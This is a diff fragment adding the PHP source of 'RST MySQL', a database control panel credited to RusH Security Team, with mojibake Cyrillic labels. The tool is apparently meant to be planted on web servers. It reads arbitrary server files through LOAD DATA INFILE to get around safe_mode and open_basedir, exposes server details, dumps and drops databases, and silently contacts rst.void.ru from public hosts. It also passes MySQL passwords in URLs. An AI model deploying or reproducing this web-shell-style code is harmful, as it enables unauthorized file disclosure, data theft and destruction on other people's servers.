+         'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
+         'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
+         'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
+         'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
+         'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
+         'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
+         '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
+         'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
+         'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
+         'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
+         'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
+         'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
+         'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
+         'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
+   send_header();
+   echo base64_decode($b_close);
+} 
+$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
+$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>������ � �������:</b><tr><td align=center><br><h5>";
+$f_error="</h5></td></tr></table>
+<CENTER><FORM><INPUT type=\"button\" value=\"   << �����    \" onClick=\"history.go(-1)\"><BR>
+</FORM></CENTER>
+</td></tr></table></td></tr></table>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+ print "
+  <html><HEAD><TITLE>RST MySQL</TITLE>
+
+  <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
+   <style>
+   td {  
+   font-family: verdana, arial, ms sans serif, sans-serif;  
+   font-size: 11px;  
+   color: #000000; 
+   }
+   BODY {
+   margin-top: 4px; 
+   margin-right: 4px; 
+   margin-bottom: 4px; 
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393; 
+   scrollbar-3dlight-color: #000000; 
+   scrollbar-darkshadow-color: #101842; 
+   scrollbar-shadow-color: #ffffff; 
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff; 
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></HEAD><BODY>";
+
+
+if ($sapi_type == "cgi") {
+    $php_type="CGI";
+} else {
+    $php_type="������";
+}
+
+$form_file="
+        <table width=80% align=center border=0>
+        <tr><td align=center>������&nbsp;�������������&nbsp;�����,&nbsp;�������&nbsp;(&nbsp;<b>$server</b>&nbsp;)</td></tr>
+        <tr><td>
+        <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
+        <tr bgcolor=#DBDCDD><td align=center>
+        ��� �������, ��� ���� �������� ��� <b>������</b> � ���
+        ������� � ������������ ���������� <b>FILE</b>, <b>SELECT</b>,
+        <b>CREATE</b>, ���������� ���� � ����� - �������� ������ ������������� �����.
+        ����� ����������� ��� <b>safe_mode</b> � <b>safe_basedir</b>
+        </td></tr></table></td></tr>
+        <form method=\"get\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <tr><td align=center><br>������ ���� � �����: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"�������� ����\">&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table><br>";
+
+$start_form="<br>
+<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td width=25>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td>
+                <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=200><br>
+        <center><b>������� ��� ������ � MySQL</b></center><hr width=98%>
+        <li>�������� ��� � ������.
+        <li>������������ ������� � ��.
+        <li>�������������� ��� � ������.
+        <li>����� �� ��� ������.<hr width=98%>
+        Type - FREE<br>
+        Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
+        <center><br><br><font face=Webdings size=+18 color=#B6B5B5>&#0168;</font><center>
+   </td>
+   <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
+        <br>��� ���������� � �������� MySQL ������� <b>���</b>, <b>������</b> (������������ MySQL) � ��� <b>�����</b>.</font></center><br>
+        <li>���� ����� ����� mysql �� ������ ����, �� ��������� ������������� ��� ��������� ��������.
+        <li>���� ������ ����� mysql �� ������ ����, �� ��������� ������������� ������ ������.
+        <li>���� ��� �������� mysql �� ������� ����, �� ��������� ������������� <b>localhost</b>
+        <li>���� ���� ��� �������� mysql �� ������ ����, �������������  ���� �� ���������, ������ (<b>3306</b>)<br><br>
+        <center>������ PHP (<b>".phpversion()."</b>)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ID PHP script (<b>".get_current_user( )."</b>)</center>
+        <br><table align=center>
+        <tr><td>��� ����� MySQL</td><td align=right>������ ����� MySQL&nbsp;</td></tr>
+        <form method=\"get\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"y\">
+        <tr>
+          <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
+          <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
+        </tr>
+        <tr><td>������ MySQL</td><td>����</td></tr>
+        <tr>                
+          <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
+          <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
+          <input type=\"submit\" value=\"������������\"></td>
+        </tr></table><br>        
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
+";
+
+if ($os =='win') {
+$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
+}else{
+   $str_k=$_ENV["BOOT_FILE"];
+   $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
+   $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";
+
+}
+
+if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
+ $serv = array(127,192,172,10);
+ $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
+ if (!in_array($adrr[0], $serv)) {
+   //��� ��������� ����� ������ ������� ������� ��� ��������
+   //����� ������ � ��������� ��������� �� � �����
+   @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
+   @readfile ("http://rst.void.ru/version_sql/version.php");  
+ }
+exit;
+}
+
+$form_ad_b="<br>
+<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
+ <tr>
+   <td>
+   <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
+    <td>
+      MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>)
+   </td>
+   <td align=center>
+      <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
+   </td>
+   <td align=right>
+      ������ PHP (<b>".phpversion()."</b>) $php_type
+   </td>
+ </tr>
+ <tr bgcolor=#DBDCDD>
+   <td>
+      IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
+   </td>
+   <td align=center>
+      ID PHP script (<b>".get_current_user( )."</b>)
+   </td>
+   <td align=right>
+      $os
+   </td>
+ </tr>
+ </table>
+</td></tr></table>
+<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� MySQL</b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>���������� PHP (ALL)</b></a>
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>�������� MySQL </b></a>
+   </td>
+ </tr>
+ <tr>
+   <td>
+        <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� Apache </b></a>
+   </td>
+   <td align=center>
+        <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>���������� MySQL </b></a> 
+   </td>
+   <td align=right>
+        <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ������������� ����� ������� ���� ��� ��������� safe_mode � safe_mode_exec_dir\"><b>���� *?</b></a>
+   </td>
+ </tr>
+</table><br>
+
+<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+<tr bgcolor=#DBDCDD><td>
+<table align=center cellpadding=0 cellspacing=0>
+ <tr bgcolor=#DBDCDD>
+   <td> <table cellpadding=4><tr><td><b>������� ����� ���� ������</b></td></tr><tr><td>
+        <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
+        <input type=\"submit\" value=\"�������\"></td>
+        </tr></table>
+   </td>
+ </tr>
+</table>
+</td>    
+</tr></table></form>
+
+<table width=80% align=center border=0 cellpadding=0>
+ <tr align=right>
+   <td width=85%></td>
+   <td width=15>
+    <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
+  </td>
+ </tr>
+</table>
+";
+        
+$cnt_b=mysql_num_rows(mysql_list_dbs());  // ���-�� ��� mysql �������  
+print "
+<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td>
+                <font face=Webdings size=6>&#0325;</font>
+            </td>
+            <td width=33%>
+                <font size=4><b>RST MySQL</b></font>
+            </td>
+            <td width=33% align=center>
+                <font color=blue><b>$server</b></font>&nbsp;[CONNECTION Ok] &nbsp;&nbsp;����� ���: <b>$cnt_b</b>
+            </td>
+            <td width=33% align=right>
+                ".date ("j F- Y- g:i")."&nbsp;&nbsp;
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+
+</td></tr>
+<tr><td>
+
+<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#DBDCDD valign=top width=170>";
+
+if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
+ $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>������ ���������� � MySQL �������� <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>��������� ������:</b><li>�� ���������� ����� ������� <b>$server</b><li>�� ���������� ����� ����� <b>$port</b><li>�� ������ ��� (login) ����� mysql <b>$login</b><li>�� ������ ������ (password) ����� mysql <b>$passwd</b><li>������ � ������� $server �������� � ������ <b>".getenv('REMOTE_ADDR')."</b><li>��������� ������ �������� �� ��������</td></tr></table><br></td></tr></table><script>alert('�� �������� ���������� ���������� � MySQL �������� $server \\n\\n ��������� ������������ �������� ������:\\n\\n������ $server\\n���� $port\\n��� $login\\n������ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
+}
+
+
+/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
+/*�������� ��� ���� �������*/
+if ($connection&&!isset($db)) {
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"��������� � ������ � �������� ������ ���\"><font color=green><b>".
+           "��������&nbsp;���&nbsp;����</b></font></a></td></tr></table>";
+   
+   $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   while ( $row=mysql_fetch_row($result) ){
+       $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //���-�� ������ ����   
+       print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
+       if ($cnt_title < 1) {
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"����� ������ $cnt_title\"><b>$row[0]</b></a>";
+       }else{
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"����� ������ $cnt_title\"><b>$row[0]</b></a>";
+       }
+       print "</td></tr></table>";
+    }
+}
+
+// ������ ������ ���� ������
+if (isset($db)){          
+  $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
+           "��������&nbsp;���&nbsp;����</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
+        "---[ <a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"�������� ������ ������\"><b>$db</b></a>".
+        " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  while ( $row=mysql_fetch_array($result) ){
+    //�������� ���������� �����(�������) � �������
+    $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
+    $count_row= mysql_fetch_array($count);
+    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
+          "<tr><td bgcolor=#DBDCDD>";
+    if ($count_row[0] < 1) { 
+       print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }else{
+        print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }
+    @mysql_free_result($count);
+  }
+} 
+
+/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/
+
+print "
+   </td>
+   <td valign=top bgcolor=#E6E7E9>";
+
+/*------------------------ R I G H T   B L O C K ! -----------------------*/
+if ($connection&&!isset($db)) { 
+$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
+if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>��������!<b></td></tr><tr><td bgcolor=red>��������� ������������� ��������� ����������� � ������� MySQL</td></tr></table>"; }
+print $form_ad_b; 
+}
+/*-------------�������� MySql------------*/
+if (isset($proc) && $proc=="TRUE"){
+$result = mysql_query("SHOW PROCESSLIST", $connection); 
+ print "<center><font size=2>�������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
+ } 
+  print "</table><br>";
+ mysql_free_result($result);
+ unset($proc);
+}
+
+/*������� ����� ����*/
+if (isset($HTTP_GET_VARS['new_db'])){
+    $new_db=trim($HTTP_GET_VARS['new_db']);
+    if (mysql_create_db ($new_db)) {
+        print ("<center><font size=2>���� <b>$new_db</b> ������� �������</font></center><br>");
+        print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    } else {
+        print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    }
+    unset($new_db);
+}
+
+/*�������� ����*/
+if (isset($HTTP_GET_VARS['drop'])){
+     $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
+     while ( $row_d=mysql_fetch_row($result_d) ){
+        if ($drop==$row_d[0]) $dr="TRUE";
+     }
+ if ($dr="TRUE") { 
+ mysql_drop_db($drop,$connection);
+ print ("<center><font size=2>���� <b>$drop</b> ������� �������</font></center><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+ }
+unset($drop);
+}
+
+/*-------------������ ������������ ���� �������-----------*/
+if (isset($f)){
+print $form_file;
+}
+if(isset($p_file)){ 
+  mysql_create_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_select_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+  mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );') or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_query("LOAD DATA INFILE \"".addslashes($p_file)."\" INTO TABLE tmp_file");
+ $query = "SELECT * FROM tmp_file";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+  /*�������� �������� ��������*/
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+   $name=mysql_field_name($result,$i);
+  } 
+  print "<table align=center border=0 cellpadding=5 cellspacing=1 width=90% bgcolor=#FFFFFF><tr><td align=center bgcolor=#DBDCDD>$name</td></tr>
+        <tr><td background=".$self."?img=st_form_bg bgcolor=#ECEDEE>
+        <form method=\"get\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        ������ ���� � �����: <input type=\"text\" name=\"p_file\" value=\"$p_file\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"�������� ����\"></form>
+  ";
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+      foreach ($line as $key =>$col_value) {          
+          print htmlspecialchars($col_value)."<br>";
+      }
+  }
+  mysql_free_result($result);
+  print "</td></tr></table><br>";
+  mysql_drop_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+} 
+
+/*--------------���������� ������� Apache------------*/
+if (isset($apc) && $apc=="TRUE"){
+ print "<center><font size=2>���������� ������� Apache [ <b>$server</b> ]</font><center>
+ <table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF>
+  <tr align=center bgcolor=#B6B5B5>
+   <td>��������</td><td>����������</td>
+  </tr> 
+  <tr bgcolor=#DAD9D9><td>��� Internet-�����</td><td>".$HTTP_SERVER_VARS["SERVER_NAME"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>IP-����� �����</td><td>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>���� Web-�������.</td><td>".$HTTP_SERVER_VARS["SERVER_PORT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>������������ CGI ���������.</td><td>".$HTTP_SERVER_VARS["GATEWAY_INTERFACE"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>�������� ��� ������� ������ �������� (�����).</td><td>".$HTTP_SERVER_VARS["REQUEST_METHOD"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Root ���������� ��� ������� ������������.</td><td>".$HTTP_SERVER_VARS["DOCUMENT_ROOT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� �������� �������.</td><td>".$HTTP_SERVER_VARS["HTTP_CONNECTION"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� httpd.conf (SERVER_ADMIN).</td><td>".$HTTP_SERVER_VARS["SERVER_ADMIN"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� �������.</td><td>".$HTTP_SERVER_VARS["SERVER_SIGNATURE"]."</td></tr>
+ </table><br>";
+ unset($apc);
+}
+
+/*---------------���������� MySQL �������--------------*/
+if (isset($stat) && $stat=="TRUE"){
+$result = mysql_query("SHOW STATUS", $connection); 
+ print "<center><font size=2>���������� ��������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=400 bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>���������� ��������� �������</td><td>�������� ����������</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+}
+
+/*---------------��������� ���������� MySQL �������--------------*/
+if (isset($var) && $var=="TRUE"){
+$result = mysql_query("SHOW VARIABLES ", $connection); 
+ print "<center><font size=2>��������� ���������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>���������� �������</td><td>�������� ����������</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+unset($var);
+}
+
+/*-------------����� ������ ������------------*/
+if (isset($db) && !isset($tbl)) {
+$cnt=mysql_num_rows(mysql_list_tables($db)); //���-�� ������ ����
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr>
+           <td>
+                <table border=0 align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&cr_tbl=new\" title=\"������� ����� ������� � ���� $db\"><b>������� �������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=bd\" title=\"������������ ������ � ����\"><b>SQL-������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&str=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ��������� ��\"><b>���������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&dump=bd\" title=\"������� ������ ���� $db\"><b>���� ����</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&drop=$db&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"������� �� $db\" onClick=\"return confirm('������� ���� $db ?')\";><b>������� ����</b></a>
+                     </td>
+                   </tr> 
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+               print "&nbsp;&nbsp;��:(<b>$db</b>)  &nbsp;&nbsp;����� ������:(<b>$cnt</b>)";
+               if (isset($t)) { print "<br>&nbsp;&nbsp;".base64_decode($t);}
+               if (isset($t2)) { print base64_decode($t2);}
+/*-------------��������� ���� ------------------*/
+if (isset($str) && $str=='TRUE'){
+  mysql_select_db($db);
+  if ($cnt < 1) { 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>���������� �������� ��������� ����<br>� ���� <font color=blue>".
+            "$db</font> ��� ������!</h5></td></tr></table><br><br>";     
+  }else{
+    $result = mysql_query("SHOW TABLE STATUS", $connection); 
+    print "<br><center><font size=2>��������� ���� [ <b>$db</b> ]</font></center>".
+          "<table align=center border=0 cellpadding=0 cellspacing=1 width=650 bgcolor=#FFFFFF>".
+          "<tr align=center bgcolor=#B6B5B5><td>��� �������</td><td>���</td><td>�����</td><td>�������</td>".
+          "<td>��������������</td><td>������(kb)</td><td>��������</td></tr>";
+    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+      $size=$row[5]/1000;
+      print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td align=center>$row[3]</td>".
+            "<td>$row[10]</td><td>$row[11]</td><td align=center>$size</td><td bgcolor=red align=center>".
+            "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&".
+            "port=$port&drop_table=$row[0]\" onClick=\"return confirm('������� ������� $row[0]?')\";>����������</a></td>
+            </tr>";  
+    } 
+    print "</table><br>";
+    mysql_free_result($result);
+  }
+} 
+
+print "    </td>
+         </tr>
+       </table>";
+}
+
+/*------------���� ����----------------*/
+$form_dump_bd=
+"<form method=\"get\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
